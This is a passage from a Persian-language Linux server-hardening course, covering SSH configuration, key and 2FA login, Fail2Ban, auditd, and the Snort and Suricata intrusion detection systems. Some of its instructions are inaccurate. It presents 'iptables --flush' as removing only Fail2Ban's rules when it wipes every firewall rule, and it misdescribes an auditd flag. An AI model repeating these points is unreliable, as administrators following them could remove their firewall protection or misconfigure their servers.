پیدا کردن مقدار #Port 22 و تغییر آن (مثلاً به 2222)

Port 2222

افزودن پورت جدید به فایروال (اگر فایروال فعال است)

firewall-cmd --add-port=2222/tcp --permanent
firewall-cmd --reload

بارگذاری مجدد سرویس SSH

systemctl restart sshd

---

۷. پیکربندی Fail2Ban برای جلوگیری از حملات Brute Force

Fail2Ban ابزاری است که به‌طور خودکار IP‌هایی که تلاش‌های ناموفق متعددی دارند را مسدود می‌کند.

نصب Fail2Ban

apt install fail2ban -y   # Ubuntu/Debian
yum install fail2ban -y   # CentOS/RHEL

ایجاد و ویرایش فایل تنظیمات

nano /etc/fail2ban/jail.local

افزودن پیکربندی برای SSH

[sshd]
enabled = true
port = 2222
maxretry = 3
bantime = 600
findtime = 300

• port = 2222 → شماره پورت SSH (اگر تغییر داده شده باشد)
• maxretry = 3 → حداکثر تلاش ناموفق قبل از مسدود شدن
• bantime = 600 → مسدود شدن IP به مدت ۱۰ دقیقه
• findtime = 300 → مدت زمان بررسی تلاش‌ها (۵ دقیقه)

فعال‌سازی Fail2Ban

systemctl enable --now fail2ban

مشاهده وضعیت Fail2Ban

fail2ban-client status sshd

---

جمع‌بندی

• ورود مستقیم root از طریق SSH را غیرفعال کنید.
• رمزهای عبور قوی و پیچیده را اجباری کنید.
• دسترسی SSH را فقط به کاربران مشخصی محدود کنید.
• تعداد تلاش‌های ناموفق را محدود کرده و ورود با کلید را جایگزین کنید.
• پورت پیش‌فرض SSH را تغییر دهید تا امنیت بیشتری داشته باشید.
• با استفاده از Fail2Ban حملات Brute Force را شناسایی و مسدود کنید.

اجرای این تنظیمات باعث می‌شود SSH سرور شما ایمن‌تر شده و احتمال نفوذ و حمله به آن به‌شدت کاهش یابد.

 [/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”استفاده از Key-based Authentication در SSH” subtitle=”توضیحات کامل”]Key-based Authentication یکی از امن‌ترین روش‌های ورود به سرورهای لینوکسی از طریق SSH است. در این روش، به جای استفاده از پسوردهای متنی که در معرض حملات Brute Force و Dictionary Attack قرار دارند، از یک جفت کلید عمومی و خصوصی برای احراز هویت امن استفاده می‌شود.

در این بخش، نحوه ایجاد کلیدهای SSH، کپی کردن آن به سرور، پیکربندی SSH برای پذیرش کلیدها و غیرفعال‌سازی ورود با پسورد به صورت جامع بررسی می‌شود.

---

۱. بررسی کلیدهای SSH در سیستم لوکال

ابتدا بررسی کنید که آیا کلیدهای SSH از قبل در سیستم شما وجود دارند یا خیر:

ls -l ~/.ssh/id_*

اگر فایل‌های id_rsa، id_rsa.pub یا id_ed25519، id_ed25519.pub را مشاهده کردید، یعنی کلیدهای SSH از قبل روی سیستم شما موجودند و نیازی به تولید مجدد آن‌ها نیست. در غیر این صورت، باید کلید جدید ایجاد کنید.

---

۲. ایجاد کلید جدید SSH در سیستم کلاینت

ssh-keygen -t ed25519 -C "your_email@example.com"

توضیح:

• -t ed25519 → استفاده از الگوریتم Ed25519 که سریع‌تر و امن‌تر از RSA است.
• -C "your_email@example.com" → این گزینه یک کامنت برای شناسایی کلید اضافه می‌کند.

خروجی:

Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/user/.ssh/id_ed25519):

می‌توانید مسیر پیش‌فرض را بپذیرید و Enter بزنید.

Enter passphrase (empty for no passphrase):
Enter same passphrase again:

اگر می‌خواهید یک Passphrase برای امنیت بیشتر اضافه کنید، آن را وارد کنید. در غیر این صورت، فقط Enter بزنید.

---

۳. کپی کردن کلید عمومی به سرور ریموت

برای انتقال کلید عمومی به سرور، می‌توان از دستور ssh-copy-id استفاده کرد:

ssh-copy-id -i ~/.ssh/id_ed25519.pub user@remote-server

در صورت عدم دسترسی به ssh-copy-id، می‌توان این کار را دستی انجام داد:

cat ~/.ssh/id_ed25519.pub | ssh user@remote-server "mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys"

پس از اجرای این دستور، باید بتوانید بدون وارد کردن پسورد وارد سرور شوید:

ssh user@remote-server

---

۴. تغییر تنظیمات SSH سرور برای استفاده از احراز هویت با کلید

ویرایش فایل تنظیمات SSH در سرور

nano /etc/ssh/sshd_config

بررسی و تغییر مقادیر زیر:

PubkeyAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
UsePAM no
PermitRootLogin no

اعمال تغییرات و ریستارت سرویس SSH

systemctl restart sshd

---

۵. تست احراز هویت با کلید SSH

برای تست ورود، کافی است از سیستم کلاینت به سرور SSH بزنید:

ssh user@remote-server

در صورتی که کلید به درستی تنظیم شده باشد، ورود بدون نیاز به پسورد انجام خواهد شد.

---

۶. اضافه کردن کلیدهای چندگانه برای کاربران مختلف

اگر نیاز به اضافه کردن چندین کلید برای کاربران مختلف دارید، می‌توانید کلیدها را به فایل authorized_keys اضافه کنید:

nano ~/.ssh/authorized_keys

افزودن چندین کلید در این فایل:

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB5ey7F8kqS1... user1@example.com
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHs8L2vOaNw5... user2@example.com

پس از ویرایش، باید دسترسی فایل را ایمن کنید:

chmod 600 ~/.ssh/authorized_keys

---

۷. تنظیم SSH Agent برای ورود خودکار بدون نیاز به وارد کردن Passphrase

اگر هنگام ورود از شما Passphrase کلید خصوصی پرسیده می‌شود، می‌توانید با استفاده از SSH Agent، کلید را در حافظه بارگذاری کنید:

eval $(ssh-agent -s)
ssh-add ~/.ssh/id_ed25519

برای حفظ این تنظیم پس از ری‌استارت سیستم، می‌توانید خطوط بالا را در ~/.bashrc یا ~/.profile اضافه کنید.

---

۸. حذف یک کلید SSH از سرور

برای حذف کلید یک کاربر، کافی است فایل authorized_keys را ویرایش کنید:

nano ~/.ssh/authorized_keys

کلید مورد نظر را حذف کنید و سپس ذخیره کنید.

---

جمع‌بندی

• Key-based Authentication امن‌ترین روش ورود به سرورهای SSH است زیرا نیازی به پسورد ندارد و در برابر حملات Brute Force مقاوم است.
• با استفاده از ssh-keygen می‌توان کلیدهای امن ایجاد کرد و با ssh-copy-id به سرور انتقال داد.
• فعال‌سازی PubkeyAuthentication و غیرفعال کردن PasswordAuthentication باعث افزایش امنیت سرور می‌شود.
• در صورت نیاز به ورود خودکار بدون Passphrase، می‌توان از ssh-agent استفاده کرد.
• اضافه کردن و حذف کلیدها در ~/.ssh/authorized_keys کنترل ورود کاربران را ساده می‌کند.

با اجرای این مراحل، امنیت SSH شما تا حد زیادی افزایش پیدا خواهد کرد.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”پیکربندی Two-Factor Authentication (2FA) برای SSH” subtitle=”توضیحات کامل”]Two-Factor Authentication (2FA) یا احراز هویت دو مرحله‌ای، یکی از بهترین روش‌های افزایش امنیت ورود به سرورهای لینوکسی است. در این روش، علاوه بر رمز عبور یا کلید SSH، کاربر باید یک کد یک‌بار مصرف (OTP) را نیز وارد کند. این کد معمولاً از طریق برنامه‌هایی مانند Google Authenticator یا FreeOTP تولید می‌شود.

در این بخش، نحوه نصب و پیکربندی Google Authenticator، تنظیم SSH برای پذیرش 2FA، و تست نهایی بررسی خواهد شد.

---

۱. نصب Google Authenticator روی سرور

ابتدا بسته libpam-google-authenticator را روی سرور نصب کنید:

در Debian/Ubuntu:

apt update && apt install libpam-google-authenticator -y

در CentOS/RHEL:

yum install epel-release -y
yum install google-authenticator -y

---

۲. ایجاد کلید مخفی و تنظیم اولیه Google Authenticator

هر کاربر باید Google Authenticator را روی حساب خود پیکربندی کند. برای این کار، کاربر مربوطه (مثلاً user1) باید دستور زیر را اجرا کند:

google-authenticator

پس از اجرای دستور، چندین پرسش ظاهر می‌شود:

Do you want authentication tokens to be time-based (y/n) y

گزینه y را انتخاب کنید. سپس یک QR Code نمایش داده می‌شود که می‌توان آن را با برنامه Google Authenticator یا FreeOTP اسکن کرد.

همچنین، کدهای Recovery نمایش داده می‌شوند. این کدها را در جایی امن ذخیره کنید.

پس از آن، به چند سؤال دیگر پاسخ دهید:

Do you want me to update your "/home/user1/.google_authenticator" file? (y/n) y

Do you want to disallow multiple uses of the same authentication token? (y/n) y

Do you want to increase the time window? (y/n) n

Do you want to enable rate-limiting? (y/n) y

---

۳. پیکربندی PAM برای احراز هویت 2FA در SSH

برای فعال‌سازی 2FA در SSH، باید فایل /etc/pam.d/sshd را ویرایش کنید:

nano /etc/pam.d/sshd

خط زیر را به انتهای فایل اضافه کنید:

auth required pam_google_authenticator.so

سپس فایل را ذخیره کرده و ببندید.

---

۴. تنظیم SSH برای پذیرش 2FA

فایل تنظیمات SSH را باز کنید:

nano /etc/ssh/sshd_config

مقادیر زیر را تغییر دهید:

ChallengeResponseAuthentication yes
PasswordAuthentication yes
UsePAM yes
AuthenticationMethods publickey,password publickey,keyboard-interactive

نکته:

• اگر فقط از پسورد استفاده می‌کنید، مقدار PasswordAuthentication را yes قرار دهید.
• اگر از کلید SSH همراه با 2FA استفاده می‌کنید، مقدار AuthenticationMethods را به publickey,keyboard-interactive تغییر دهید.

---

۵. ریستارت سرویس SSH

پس از اعمال تغییرات، سرویس SSH را ریستارت کنید:

systemctl restart sshd

---

۶. تست ورود با 2FA

اکنون می‌توانید از یک کلاینت SSH به سرور متصل شوید:

ssh user@remote-server

ابتدا از شما رمز عبور یا کلید SSH خواسته می‌شود. پس از آن، یک پیام مانند زیر نمایش داده می‌شود:

Verification code:

در این مرحله، کد تولید شده توسط Google Authenticator را وارد کنید.

در صورت صحت کد، ورود انجام خواهد شد.

---

۷. وادار کردن تمام کاربران به استفاده از 2FA

برای اطمینان از اینکه همه کاربران از 2FA استفاده می‌کنند، می‌توانید دسترسی بدون 2FA را مسدود کنید.

برای این کار، فایل /etc/ssh/sshd_config را ویرایش کنید:

nano /etc/ssh/sshd_config

و مقدار زیر را تغییر دهید:

AuthenticationMethods publickey,keyboard-interactive

سپس SSH را مجدداً راه‌اندازی کنید:

systemctl restart sshd

---

۸. غیرفعال کردن 2FA برای کاربران خاص

اگر می‌خواهید 2FA را برای برخی کاربران غیرفعال کنید، می‌توانید قوانین PAM را تنظیم کنید.

فایل /etc/pam.d/sshd را باز کنید:

nano /etc/pam.d/sshd

و خط زیر را اضافه کنید:

auth [success=1 default=ignore] pam_succeed_if.so user in group no2fa

سپس گروه no2fa را ایجاد کنید:

groupadd no2fa

و کاربر مورد نظر را به این گروه اضافه کنید:

usermod -aG no2fa user1

اکنون کاربر user1 دیگر نیازی به استفاده از 2FA ندارد.

---

جمع‌بندی

• Two-Factor Authentication (2FA) امنیت ورود SSH را به شدت افزایش می‌دهد.
• Google Authenticator یا FreeOTP برای تولید کدهای یک‌بار مصرف استفاده می‌شوند.
• با تغییر تنظیمات PAM و sshd_config، می‌توان SSH را به گونه‌ای تنظیم کرد که ورود فقط با استفاده از 2FA انجام شود.
• در صورت نیاز، امکان غیرفعال کردن 2FA برای کاربران خاص وجود دارد.

با این تنظیمات، سرور شما در برابر حملات Brute Force و سرقت رمز عبور مقاوم‌تر خواهد شد.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”تنظیمات Fail2Ban برای جلوگیری از حملات Brute Force” subtitle=”توضیحات کامل”]Fail2Ban یک ابزار امنیتی برای محافظت از سرور در برابر حملات Brute Force است. این ابزار لاگ‌های سرویس‌های مختلف را بررسی کرده و IP‌های مشکوک را مسدود می‌کند. در این بخش، نصب، پیکربندی و بهینه‌سازی Fail2Ban برای جلوگیری از حملات SSH و سرویس‌های دیگر بررسی خواهد شد.

---

۱. نصب Fail2Ban

در Debian/Ubuntu:

apt update && apt install fail2ban -y

در CentOS/RHEL:

yum install epel-release -y
yum install fail2ban -y

---

۲. فعال‌سازی و اجرای Fail2Ban

بعد از نصب، سرویس را فعال کرده و اجرا کنید:

systemctl enable fail2ban
systemctl start fail2ban

برای بررسی وضعیت Fail2Ban اجرا کنید:

systemctl status fail2ban

---

۳. پیکربندی Fail2Ban برای SSH

Fail2Ban از طریق فایل /etc/fail2ban/jail.conf پیکربندی می‌شود. اما تغییرات نباید مستقیماً در این فایل اعمال شوند. برای جلوگیری از تغییرات ناخواسته، باید یک نسخه سفارشی (jail.local) ایجاد کنیم.

cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
nano /etc/fail2ban/jail.local

مقادیر زیر را تنظیم کنید:

[DEFAULT]
# مدت زمان مسدود شدن IP (در ثانیه)
bantime = 600

# حداکثر تلاش‌های ناموفق قبل از مسدود شدن
maxretry = 5

# مدت زمان نظارت روی تلاش‌های ناموفق (در ثانیه)
findtime = 600

# ارسال هشدار از طریق ایمیل (اختیاری)
destemail = admin@example.com
sender = fail2ban@example.com
mta = sendmail

# اقدام برای مسدودسازی IP
action = %(action_mwl)s

[sshd]
enabled = true
port = ssh
filter = sshd
logpath = /var/log/auth.log
maxretry = 5

نکات مهم:

• bantime = 600 یعنی IP متخلف به مدت ۱۰ دقیقه مسدود خواهد شد.
• maxretry = 5 یعنی بعد از ۵ تلاش ناموفق، IP مسدود می‌شود.
• findtime = 600 یعنی اگر ۵ تلاش در ۱۰ دقیقه انجام شود، IP مسدود خواهد شد.

پس از ویرایش، فایل را ذخیره کنید و Fail2Ban را ریستارت کنید:

systemctl restart fail2ban

---

۴. بررسی وضعیت Fail2Ban

برای مشاهده وضعیت IP‌های مسدود شده و تعداد حملات شناسایی شده، دستور زیر را اجرا کنید:

fail2ban-client status sshd

خروجی مثال:

Status for the jail: sshd
|- Filter
|  |- Currently failed: 0
|  |- Total failed: 10
|  `- File list: /var/log/auth.log
`- Actions
   |- Currently banned: 2
   |- Total banned: 5
   `- Banned IP list: 192.168.1.100 203.0.113.25

---

۵. مسدود کردن IP به‌صورت دستی

اگر بخواهید یک IP خاص را مسدود کنید، از دستور زیر استفاده کنید:

fail2ban-client set sshd banip 192.168.1.100

برای رفع مسدودی یک IP خاص:

fail2ban-client set sshd unbanip 192.168.1.100

---

۶. اضافه کردن قوانین Firewall برای جلوگیری از دور زدن Fail2Ban

به طور پیش‌فرض، Fail2Ban از iptables برای مسدودسازی IP استفاده می‌کند. اما اگر از firewalld استفاده می‌کنید، باید Fail2Ban را با firewalld سازگار کنید.

فعال کردن firewalld:

systemctl enable firewalld
systemctl start firewalld

اضافه کردن Fail2Ban به firewalld:

firewall-cmd --permanent --add-rich-rule='rule family="ipv4" source address="192.168.1.100" reject'
firewall-cmd --reload

---

۷. تنظیم ایمیل هشدار برای مسدود شدن IP

Fail2Ban می‌تواند هنگام مسدود کردن یک IP، هشدار ایمیلی ارسال کند. برای این کار، ابتدا بسته sendmail را نصب کنید:

در Debian/Ubuntu:

apt install sendmail -y

در CentOS/RHEL:

yum install sendmail -y

سپس در فایل /etc/fail2ban/jail.local مقدار action را تغییر دهید:

action = %(action_mwl)s

سرویس را ریستارت کنید:

systemctl restart fail2ban

---

۸. پیکربندی Fail2Ban برای سایر سرویس‌ها

علاوه بر SSH، می‌توان Fail2Ban را برای محافظت از سرویس‌های دیگری مانند Nginx، Apache، و MySQL تنظیم کرد.

پیکربندی برای Nginx

[nginx-http-auth]
enabled = true
port = http,https
filter = nginx-http-auth
logpath = /var/log/nginx/error.log
maxretry = 5

پیکربندی برای Apache

[apache-auth]
enabled = true
port = http,https
filter = apache-auth
logpath = /var/log/apache2/error.log
maxretry = 5

بعد از تنظیمات، Fail2Ban را ریستارت کنید:

systemctl restart fail2ban

---

۹. حذف و مشاهده قوانین فعال Fail2Ban

برای مشاهده قوانین iptables که Fail2Ban اضافه کرده است:

iptables -L -n --line-numbers

برای حذف تمامی قوانین Fail2Ban:

iptables --flush

---

جمع‌بندی

• Fail2Ban ابزاری برای جلوگیری از حملات Brute Force است که IP‌های مشکوک را مسدود می‌کند.
• با تنظیم jail.local می‌توان قوانین را سفارشی‌سازی کرد.
• Fail2Ban از طریق iptables یا firewalld کار می‌کند و می‌توان برای سرویس‌های دیگر مانند Nginx و Apache نیز از آن استفاده کرد.
• امکان ارسال هشدار ایمیلی هنگام مسدود شدن IP وجود دارد.

با این تنظیمات، Fail2Ban از سرور شما در برابر حملات مداوم محافظت می‌کند.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”نحوه استفاده از auditd برای نظارت بر تغییرات سیستم” subtitle=”توضیحات کامل”]Auditd یکی از ابزارهای قدرتمند لینوکس برای نظارت بر تغییرات فایل‌ها، اجرای دستورات، و رویدادهای امنیتی سیستم است. این ابزار به مدیران سرور کمک می‌کند که هرگونه تغییر مشکوک را شناسایی و بررسی کنند.

در این بخش، نحوه نصب، پیکربندی، و استفاده از auditd برای نظارت بر تغییرات سیستم را با مثال‌های عملی بررسی می‌کنیم.

---

۱. نصب و راه‌اندازی auditd

۱.۱. نصب auditd

در Ubuntu/Debian:

sudo apt install auditd audispd-plugins -y

در CentOS/RHEL:

sudo yum install audit -y

---

۱.۲. فعال‌سازی و بررسی وضعیت سرویس

sudo systemctl enable --now auditd
sudo systemctl status auditd

• سرویس auditd را فعال کرده و بررسی می‌کنیم که به درستی اجرا شده باشد.

---

۲. پیکربندی auditd برای نظارت بر تغییرات فایل‌ها

۲.۱. مانیتور کردن تغییرات یک فایل خاص

به‌عنوان مثال، برای نظارت بر تغییرات فایل /etc/passwd، دستور زیر را اجرا می‌کنیم:

sudo auditctl -w /etc/passwd -p wa -k passwd_changes

• -w /etc/passwd → مسیر فایلی که نظارت می‌شود.
• -p wa → مجوزهای نظارت (w: تغییر فایل، a: دسترسی به آن).
• -k passwd_changes → برچسب (Key) برای گزارشات لاگ‌ها.

بررسی قوانین ثبت‌شده:

sudo auditctl -l

• این دستور تمامی قوانین فعال را نمایش می‌دهد.

---

۲.۲. نظارت بر کل یک دایرکتوری

اگر بخواهیم تمام تغییرات در /etc/ssh/ را ثبت کنیم:

sudo auditctl -w /etc/ssh/ -p wa -k ssh_config_changes

• هر تغییری در فایل‌های پیکربندی SSH ثبت خواهد شد.

---

۳. نظارت بر اجرای دستورات خاص

برای نظارت بر اجرای یک دستور خاص (مثلاً nano):

sudo auditctl -a always,exit -F path=/usr/bin/nano -F perm=x -k nano_execution

• -a always,exit → ثبت اجرای دستور هنگام خروج.
• -F path=/usr/bin/nano → نظارت بر مسیر باینری nano.
• -F perm=x → نظارت بر اجرای (execute) این فایل.
• -k nano_execution → برچسب برای فیلتر کردن لاگ‌ها.

---

۴. مشاهده لاگ‌های auditd

۴.۱. مشاهده گزارشات ثبت‌شده

برای مشاهده رویدادهای ثبت‌شده:

sudo ausearch -k passwd_changes

• این دستور همه لاگ‌های مرتبط با تغییرات فایل /etc/passwd را نمایش می‌دهد.

---

۴.۲. فیلتر کردن لاگ‌ها بر اساس کاربر

مشاهده تغییرات انجام‌شده توسط یک کاربر خاص (مثلاً user1):

sudo ausearch -ua $(id -u user1)

• تمامی فعالیت‌های کاربر user1 نمایش داده خواهد شد.

---

۴.۳. مشاهده تغییرات اخیر در سیستم

برای مشاهده تمامی تغییرات اخیر:

sudo aureport -f -i

• این دستور فایل‌هایی که اخیراً تغییر کرده‌اند را نمایش می‌دهد.

---

۵. تنظیم قوانین دائمی در auditd

قوانین auditctl بعد از ریستارت سیستم از بین می‌روند. برای دائمی کردن آن‌ها، باید در فایل /etc/audit/rules.d/audit.rules ثبت شوند.

مثال:

sudo nano /etc/audit/rules.d/audit.rules

و اضافه کردن قوانین زیر:

-w /etc/passwd -p wa -k passwd_changes
-w /etc/ssh/ -p wa -k ssh_config_changes
-a always,exit -F path=/usr/bin/nano -F perm=x -k nano_execution

سپس برای اعمال تغییرات:

sudo systemctl restart auditd

---

۶. تنظیم محدودیت اندازه لاگ‌ها

برای جلوگیری از پر شدن فضای دیسک، می‌توان اندازه لاگ‌های auditd را محدود کرد.

ویرایش فایل پیکربندی:

sudo nano /etc/audit/auditd.conf

و تنظیم موارد زیر:

max_log_file = 50
num_logs = 5

• max_log_file = 50 → حداکثر حجم لاگ‌ها ۵۰ مگابایت تنظیم می‌شود.
• num_logs = 5 → ۵ نسخه از لاگ‌ها نگهداری می‌شود و قدیمی‌ترین آن حذف خواهد شد.

اعمال تغییرات:

sudo systemctl restart auditd

---

۷. حذف یک قانون از auditd

اگر بخواهیم یک قانون نظارت را حذف کنیم، ابتدا لیست قوانین را می‌بینیم:

sudo auditctl -l

سپس برای حذف یک قانون خاص (مثلاً نظارت بر /etc/passwd):

sudo auditctl -W /etc/passwd -p wa -k passwd_changes

---

جمع‌بندی

✅ نصب و راه‌اندازی auditd برای نظارت بر تغییرات سیستم.
✅ ایجاد قوانین نظارت برای ثبت تغییرات فایل‌ها و اجرای دستورات.
✅ مشاهده و تحلیل لاگ‌های ثبت‌شده با ausearch و aureport.
✅ ثبت قوانین دائمی برای جلوگیری از حذف بعد از ریستارت سیستم.
✅ مدیریت حجم لاگ‌ها برای بهینه‌سازی ذخیره‌سازی.

با استفاده از auditd می‌توان هرگونه تغییرات مشکوک یا غیرمجاز در سیستم را شناسایی کرد و اقدامات امنیتی مناسب را انجام داد.[/cdb_course_lesson][cdb_course_lesson title=”فصل 2. امنیت شبکه و سیستم”][/cdb_course_lesson][cdb_course_lesson title=”IDS/IPS”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”معرفی و پیکربندی Snort به عنوان سیستم تشخیص نفوذ (IDS)” subtitle=”توضیحات کامل”]Snort یک سیستم تشخیص نفوذ (IDS – Intrusion Detection System) متن‌باز است که می‌تواند ترافیک شبکه را آنالیز و تهدیدات امنیتی را شناسایی کند. این ابزار توسط Cisco توسعه داده شده و امکان استفاده به عنوان سیستم پیشگیری از نفوذ (IPS – Intrusion Prevention System) را نیز دارد.

در این بخش، نصب، پیکربندی و استفاده از Snort برای شناسایی تهدیدات شبکه به صورت جامع بررسی خواهد شد.

---

۱. نصب Snort در لینوکس

در Debian/Ubuntu:

apt update && apt install snort -y

در CentOS/RHEL:

yum install epel-release -y
yum install snort -y

مشاهده نسخه Snort:

snort -V

---

۲. پیکربندی اولیه Snort

مسیر فایل‌های پیکربندی Snort:

فایل	مسیر
فایل اصلی پیکربندی	/etc/snort/snort.conf
دایرکتوری قوانین	/etc/snort/rules/
لاگ‌های IDS	/var/log/snort/

ویرایش فایل تنظیمات اصلی:

nano /etc/snort/snort.conf

تنظیم مقدار ipvar HOME_NET (آدرس شبکه داخلی):

ipvar HOME_NET 192.168.1.0/24

تنظیم مقدار ipvar EXTERNAL_NET (شبکه خارجی):

ipvar EXTERNAL_NET any

تعریف مسیر قوانین Snort:

var RULE_PATH /etc/snort/rules

---

۳. ایجاد قوانین اولیه برای شناسایی تهدیدات

ایجاد یک قانون ساده برای شناسایی Ping Sweep:

nano /etc/snort/rules/local.rules

و اضافه کردن قانون زیر:

alert icmp any any -> $HOME_NET any (msg:"Ping Sweep Detected"; sid:1000001; rev:1;)

افزودن فایل local.rules به پیکربندی اصلی:

include $RULE_PATH/local.rules

ریستارت کردن Snort برای اعمال تنظیمات:

systemctl restart snort

---

۴. اجرای Snort در حالت مختلف

۱) اجرای Snort در حالت تست (Sniffer Mode):

snort -vde

۲) اجرای Snort در حالت Packet Logger:

snort -dev -l /var/log/snort/

۳) اجرای Snort در حالت IDS (با قوانین فعال):

snort -c /etc/snort/snort.conf -i eth0

۴) مشاهده لاگ‌های تولید شده توسط Snort:

cat /var/log/snort/alert

---

۵. تنظیم Snort برای ارسال هشدار به syslog

ویرایش فایل snort.conf و افزودن تنظیمات مربوط به syslog:

output alert_syslog: LOG_AUTH LOG_ALERT

ریستارت Snort برای اعمال تنظیمات جدید:

systemctl restart snort

مشاهده هشدارهای Snort در syslog:

tail -f /var/log/syslog | grep snort

---

۶. بروزرسانی و مدیریت قوانین Snort

۱) دانلود و بروزرسانی قوانین از snort.org:

cd /etc/snort/rules/
wget https://www.snort.org/rules/snortrules-snapshot-2990.tar.gz
tar -xvzf snortrules-snapshot-2990.tar.gz

۲) حذف قوانین قدیمی:

rm -rf /etc/snort/rules/*.rules

۳) افزودن قوانین جدید به snort.conf:

include $RULE_PATH/community.rules
include $RULE_PATH/emerging-threats.rules

ریستارت Snort برای اعمال قوانین جدید:

systemctl restart snort

---

۷. استفاده از Snort به عنوان IPS

اگر بخواهید Snort را در حالت سیستم پیشگیری از نفوذ (IPS) اجرا کنید، باید ترافیک را فیلتر کند.

۱) نصب iptables برای مسیریابی ترافیک به Snort:

apt install iptables -y  # برای Debian/Ubuntu
yum install iptables -y  # برای CentOS/RHEL

۲) تنظیم iptables برای ارسال ترافیک به Snort:

iptables -A INPUT -j QUEUE

۳) اجرای Snort در حالت IPS:

snort -Q --daq ipq -c /etc/snort/snort.conf -i eth0

---

۸. تنظیمات پیشرفته و بهینه‌سازی Snort

۱) افزایش حافظه بافر برای بهبود عملکرد:

config detection: search-method ac

۲) تنظیم Snort برای پردازش چند رشته‌ای (Multi-threading) در snort.conf:

config binding: cpu_set 0,1,2,3

۳) تنظیم Snort برای کاهش False Positive:

config threshold: track by_src, count 10, seconds 60

---

۹. مشاهده و تجزیه و تحلیل هشدارها

۱) نمایش هشدارهای ثبت‌شده در Snort:

cat /var/log/snort/alert

۲) مشاهده هشدارهای اخیر با tail:

tail -f /var/log/snort/alert

۳) جستجوی یک IP خاص در هشدارها:

grep "192.168.1.100" /var/log/snort/alert

---

جمع‌بندی

• Snort یک سیستم تشخیص نفوذ (IDS) و پیشگیری از نفوذ (IPS) است که می‌تواند تهدیدات شبکه را شناسایی کند.
• با پیکربندی مناسب، Snort می‌تواند هشدارهای امنیتی دقیق و بدون خطای زیاد (False Positive) ارائه دهد.
• قوانین Snort باید به‌طور مداوم بروزرسانی شوند تا بتواند تهدیدات جدید را شناسایی کند.
• می‌توان Snort را با syslog و iptables ادغام کرد تا نظارت و امنیت شبکه بهینه‌تر شود.

با اجرای این تنظیمات، Snort به عنوان یک لایه امنیتی قوی برای مانیتورینگ و محافظت از شبکه شما عمل خواهد کرد.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”استفاده از Suricata برای نظارت و تحلیل ترافیک شبکه” subtitle=”توضیحات کامل”]Suricata یک سیستم تشخیص نفوذ (IDS)، سیستم پیشگیری از نفوذ (IPS) و تحلیلگر ترافیک شبکه (NSM) است که می‌تواند ترافیک شبکه را بررسی و تحلیل کند. این ابزار متن‌باز بوده و قابلیت پردازش چندرشته‌ای (multi-threading) دارد که باعث بهبود عملکرد و کارایی آن در مقایسه با Snort می‌شود.

در این بخش، نصب، پیکربندی و استفاده از Suricata برای نظارت بر شبکه و تحلیل ترافیک به‌صورت جامع بررسی خواهد شد.

---

۱. نصب Suricata در لینوکس

نصب در Debian/Ubuntu:

sudo add-apt-repository ppa:oisf/suricata-stable -y
sudo apt update
sudo apt install suricata -y

نصب در CentOS/RHEL:

sudo yum install epel-release -y
sudo yum install suricata -y

مشاهده نسخه Suricata برای اطمینان از نصب صحیح:

suricata --build-info

---

۲. تنظیمات اولیه Suricata

مسیر فایل‌های پیکربندی Suricata:

فایل	مسیر
فایل اصلی پیکربندی	/etc/suricata/suricata.yaml
دایرکتوری قوانین	/etc/suricata/rules/
لاگ‌های IDS	/var/log/suricata/

ویرایش فایل suricata.yaml و تنظیم مقدار HOME_NET

sudo nano /etc/suricata/suricata.yaml

و تغییر مقدار HOME_NET برای تعریف شبکه داخلی:

vars:
  address-groups:
    HOME_NET: "[192.168.1.0/24]"
    EXTERNAL_NET: "!$HOME_NET"

---

۳. اجرای Suricata در حالت‌های مختلف

۱) اجرای Suricata در حالت نظارت (IDS Mode):

sudo suricata -c /etc/suricata/suricata.yaml -i eth0

۲) اجرای Suricata در حالت ثبت لاگ (NSM – Network Security Monitoring Mode):

sudo suricata -c /etc/suricata/suricata.yaml -i eth0 --pcap

۳) مشاهده لاگ‌های Suricata:

tail -f /var/log/suricata/fast.log

---

۴. ایجاد و تنظیم قوانین برای شناسایی تهدیدات

ایجاد یک قانون برای شناسایی پینگ (ICMP Ping Detection)

sudo nano /etc/suricata/rules/local.rules

افزودن قانون زیر به فایل:

alert icmp any any -> $HOME_NET any (msg:"ICMP Ping Detected"; sid:1000001; rev:1;)

افزودن local.rules به فایل suricata.yaml

rule-files:
  - local.rules

ریستارت کردن Suricata برای اعمال تنظیمات جدید

sudo systemctl restart suricata

مشاهده هشدارهای ثبت‌شده:

sudo tail -f /var/log/suricata/fast.log

---

۵. بروزرسانی قوانین Suricata

۱) نصب suricata-update برای دانلود قوانین جدید:

sudo apt install suricata-update -y  # برای Ubuntu/Debian
sudo yum install suricata-update -y  # برای CentOS/RHEL

۲) بروزرسانی قوانین:

sudo suricata-update

۳) ریستارت کردن Suricata پس از بروزرسانی قوانین:

sudo systemctl restart suricata

---

۶. تنظیم Suricata برای ارسال هشدارها به Syslog

ویرایش فایل suricata.yaml و فعال‌سازی ارسال هشدارها به Syslog

outputs:
  - fast:
      enabled: yes
      filename: /var/log/suricata/fast.log
  - syslog:
      enabled: yes
      facility: local5
      format: "[Suricata] [%i] %m"

ریستارت کردن سرویس برای اعمال تغییرات

sudo systemctl restart suricata

مشاهده هشدارهای Suricata در Syslog

sudo tail -f /var/log/syslog | grep Suricata

---

۷. استفاده از Suricata در حالت IPS

۱) تنظیم iptables برای ارسال ترافیک به Suricata

sudo iptables -I INPUT -j NFQUEUE
sudo iptables -I OUTPUT -j NFQUEUE

۲) اجرای Suricata در حالت IPS:

sudo suricata -c /etc/suricata/suricata.yaml --af-packet

